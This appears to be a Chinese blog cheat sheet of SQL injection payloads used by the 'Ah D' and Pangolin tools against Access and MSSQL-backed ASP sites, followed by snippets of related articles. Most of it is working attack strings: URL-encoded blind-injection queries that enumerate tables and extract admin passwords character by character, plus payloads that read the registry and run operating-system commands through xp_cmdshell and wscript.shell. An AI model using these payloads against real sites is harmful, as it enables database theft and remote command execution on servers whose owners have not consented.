啊D工具语句 适合Access和Mssql注入

啊D注入工具中使用的SQL注入语句

爆user
and char(124)+user+char(124)=0   ****char(124)= | *****
?Id=1659%20and%20char(124)%2Buser%2Bchar(124)=0 

and 1=1 : ?Id=1659%20%61%6E%64%20%31%3D%31

and 1=2:   Id=1659%20%61%6E%64%20%31%3D%32
检查SA权限:And char(124)+Cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))+char(124)=1

爆当前库: and char(124)+db_name()+char(124)=0 --

检查是否为mssql数据库:and exists (select * from sysobjects)
%20%20and%20exists%20(select%20*%20from%20sysobjects)

判断表名:
panolin: ?Id=1659%20and%200%3C=(select%20count(*)%20from%20admin)%20and%201=1
  admin也可以编码:=%61%64%6D%69%6E

啊D:?Id=1659%20and%20exists%20(select%20*%20from%20[admin])

爆列名:
啊D:%20and%20exists%20(select%20[pwd]%20from%20[admin]) 

panolin: %20and%200%3C=(select%20count(pwd)%20from%20admin)%20and%201=1
%20and%200%3C=(select%20count(id)%20from%20admin)%20and%201=1

判断记录数:
  %20and%20(select%20%20len(cstr(count(*)))%20from%20admin%20where%201=1)=2%20and%201=1
判断admin表中有几个记录 如:10 cstr(10) 转换成字符型就是"10" 那么他的长度就是2,所以这里=2

阿D: /Article.asp?Id=1659%20and%20(select%20Count(1)%20from%20[admin]%20where%201=1)%20between%200%20and%208 判断在0-9999之间,这句是判断在0-8之间

/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),2,1)))%20%20from%20admin%20where%201=1)=48%20and%201=1
记录数的第一位=48 也就是0
/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),2,1)))%20%20from%20admin%20where%201=1)=49%20and%201=1
记录数的第二位=49 也就是1  所以=10

猜字段长度:
Article.asp?Id=1659%20and%20(select%20top%201%20len(cstr(pwd))%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3C=32%20and%201=1  第一条记录的字段长度
                                                                                                                 top%201  第一条
Article.asp?Id=1659%20and%20(select%20top%201%20len(cstr(pwd))%20from%20(select%20top%201%20*%20from%20(select%20top%202%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3C=32%20and%201=1  第二条记录的字段
                                                                                                                 top%202   第二条
阿D:
       Article.asp?Id=1659%20and%20(select%20top%201%20len([pwd])%20from%20(Select%20Top%201%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20between%200%20and%2032 判断第一条记录的字段长度0-32之间
                                                                                     top%202   第二条
       Article.asp?Id=1659%20and%20(select%20top%201%20len([pwd])%20from%20(Select%20Top%202%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20between%200%20and%2032 判断第二条记录的字段长度0-32之间
两个top 1 保留一个top 1 ,改另外一个成top x 就可以猜第x个字段长度 或改最后一个top (pangolin就是改最后一个top来爆第N杀记录的长度)

猜字段内容:
%20and%20(select%20top%201%20abs(asc(mid(cstr(pwd),1,1)))%20%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3E32%20and%201=1 第一条记录、第一位的asc码
%20and%20(select%20top%201%20abs(asc(mid(cstr(pwd),19,1)))%20%20from%20(select%20top%201%20*%20from%20(select%20top%201%20*%20from%20admin%20where%201=1%20order%20by%201)%20t%20order%20by%201%20desc)t%20where%201=1)%3E32%20and%201=1 第19位的asc码

阿D:
/Article.asp?Id=1659%20and%20(select%20top%201%20asc(mid(cstr(pwd),7,1))%20from%20(Select%20Top%201%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20%20between%2030%20and%2080 第一条记录、第7位的asc码在30~80之间
                                                                                            top%201  第一条
                                                                                            top%202   第二条
/Article.asp?Id=1659%20and%20(select%20top%201%20asc(mid(cstr(pwd),7,1))%20from%20(Select%20Top%202%20[pwd]%20from%20[admin]%20where%201=1%20order%20by%20[pwd])%20T%20Order%20by%20[pwd]%20desc)%20%20between%2030%20and%2080 第二条记录、第7位的asc码在30~80之间

猜中文:
    /Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),2,1)))%20%20from%20admin%20where%201=1)%3C=256%20and%201=1 第一个列的内容是不是》=256
/Article.asp?Id=1659%20and%20(select%20%20abs(asc(mid(cstr(count(*)),1,1)))%20%20from%20admin%20where%201=1)%3C=256%20and%201=1 第二个列是不是》=256

检查数据库中有多少个库:And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From [sysobjects] where xtype=char(85) and status >1)>0

爆第一个库: And (Select Top 1 char(124)+name+char(124) From (Select Top 1 [id],[name] From [sysobjects] where xtype=char(85) and status >1 Order by [id],[name]) T Order by [id] desc,[name] desc)>0 --

爆第N个库:And (Select Top 1 char(124)+name+char(124) From (Select Top |N| [id],[name] From [sysobjects] where xtype=char(85) and status >1 Order by [id],[name]) T Order by [id] desc,[name] desc)>0 --

爆有多少个列名:And (Select char(124)+Cast(Count(*) as varchar(8000))+char(124) From [库名]..[syscolumns] where (id = (SELECT TOP 1 id FROM [sysobjects] WHERE name = char(97)+char(116)+char(116)+char(97)+char(99)+char(104))))>0

爆列名:And (Select Top 1 char(124)+name+char(124) From (Select Top 1 [name] From [syscolumns] where (id = (SELECT TOP 1 id FROM [sysobjects] WHERE name = char(97)+char(116)+char(116)+char(97)+char(99)+char(104))) Order by [name]) T Order by [name] desc)>0 --

读注册表:
DROP TABLE D99_REG;CREATE TABLE D99_REG([ID] int,[Data][varchar](255))--

DECLARE @result varchar(255) EXEC master.dbo.xp_regread‘HKEY_LOCAL_MACHINE‘,‘SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots‘, ‘/‘,@result output insert into D99_REG([ID],[data]) values(‘9999‘,@result);--

And (Select char(124)+Cast(Count(1) as varchar(8000))+char(124) From D99_REG)>0 --

执行CMD

DROP TABLE D99_CMD;CREATE TABLE D99_CMD([Data][varchar](1000),ID int NOT NULL IDENTITY (1,1)) insert D99_CMD exec master.dbo.xp_cmdshell ‘dir c:\‘--

And (Select char(124)+Cast(Data as varchar(4000))+char(124) From D99_CMD)>0--

执行WSCRIPT:

DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run], NULL, [cmd.exe /c dir c:\] --

恢复XP_CMDSHELL

;exec master..sp_dropextendedproc ‘xp_cmdshell‘--
时间: 2024-10-06 06:42:42

啊D工具语句 适合Access和Mssql注入的相关文章

学习笔记五-sql之access和mssql注入

1,access数据库的介绍 关系数据库管理系统,微软的小型数据库 优势:提高速度,减少代码量,避免使用过程调用 缺陷:数据过大,性能下降,数据库刷写导致问题,安全不行 后缀名为*.mdb 打开工具:辅臣,破障 搭建平台:小旋风aspweb工具 2,access数据库调用分析 asp网站,(id=)参数传递,看到参数,看查询语句,使用破障分析数据 代码审计看是否有过滤 3,access注入原理 首先判断是否存在注入点 '    ,and 1=1,and 1=2, 如果前面的过滤掉了,用后面的判断

Navicat工具链接 mysql"Access denied for user'root'@'IP'" 用户远程赋值

如题 用Navicat远程连接数据库出现错误   给用户添加权限 连接MySQL mysql -uroot -p: use mysql; 更改权限 使用grant all privileges on来更改用户对应某些库的远程权限 grant all privileges on 库名.表名 to '用户名'@'IP地址' identified by '密码' with grant option; flush privileges; 示例 GRANT ALL PRIVILEGES ON *.* TO

MSSQL注入

①判断数据库类型and exists (select * from sysobjects)--返回正常为mssql(也名sql server)and exists (select count(*) from sysobjects)--有时上面那个语句不行就试试这个哈 ②判断数据库版本       and [email protected]@version--这个语句要在有回显的模式下才可以哦       and substring((select @@version),22,4)='2008'-

mssql注入——环境搭建

mssql 注入参考语句:   https://websec.ca/kb/sql_injection 结尾:这个环境搭建还真的麻烦,目前只是装了mssql,web环境还是算了…… 原文地址:https://www.cnblogs.com/blogs-1024/p/11337385.html

MSSQL注入语句

(1)                                                                                  判断数据库类型:                                                                                   Access:  aNd aSc(cHr(97))=97 and exists(select id from MSysAccessObjects)

学习笔记之ACCESS和MS-SQL数据库与ZBLOG系统如何选择搭配?

我开始接触ZBLOG系统是因为先了解了月光博客和卢松松之后,因为他们的博客很强悍,让我学习到了不少知识,因此也开始建站了,那时候由于是早期,数据量一般都小,而且系统也都不成熟,因此只有ACCESS这样的小型数据库,也是因为互联网初级发展阶段的缘故,大家对相对复杂的数据库并不了解,也不懂的如何搭建,尤其是对于我这样的入门级人士来说,根本不会搭建SQL SERVER这样的中型数据库,如果要建设自己的博客,那就相当困难了. 环境配置和案例:采用ZBLOG ASP系统,搭配SQL ERVER2008数据

详解基于MSSQL “order by”语句报错的SQL注入技术

SQL注入,又名黑客技术之母,是一种臭名昭著的安全漏洞,由于流毒甚广,已经给网络世界造成了巨大的破坏.当然,对于该漏洞的利用技术,也是花样繁多,如访问存储在数据库中的数据,使用MySQL的load和into outfile语句读写服务器代码,以及使用SA帐户在MSSQL中执行命令,等等. 在本文中,我们要利用的SQL注入漏洞出现在下面的情形中:当用户提供的数据通过MSSQL的“Order By”语句中的值进行传递时,如果SQL查询中存在语法错误,那么应用程序就会抛出SQL Server错误. 如

【sql语句】好用的sql语句—适合自己熟悉陌生的数据库

这几天学习公司系统的数据流向.主要涉及到几个表的数据.但是表中的数据有上百万条,所以如果出现sql语句没有带条件的,会导致查询卡死,甚至出现内存溢出的情况.公司用到的数据库是sqlserver,所以下列的sql语句主要是针对sqlserver数据库的,其他数据库大同小异. 1.当我要熟悉数据库表结构的时候,我需要执行一个语句,这条语句能够查看数据库的很多信息,如列名,字段名,字段大小,字段类型等等....... select * from information_schema.columns w

手工MSSQL注入常用SQL语句

个人收集整理 and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 1=(select db_name()) //当前数据库名 and 1=(select @@servername) //本地服务名 and 1=(select IS_SRVROLEME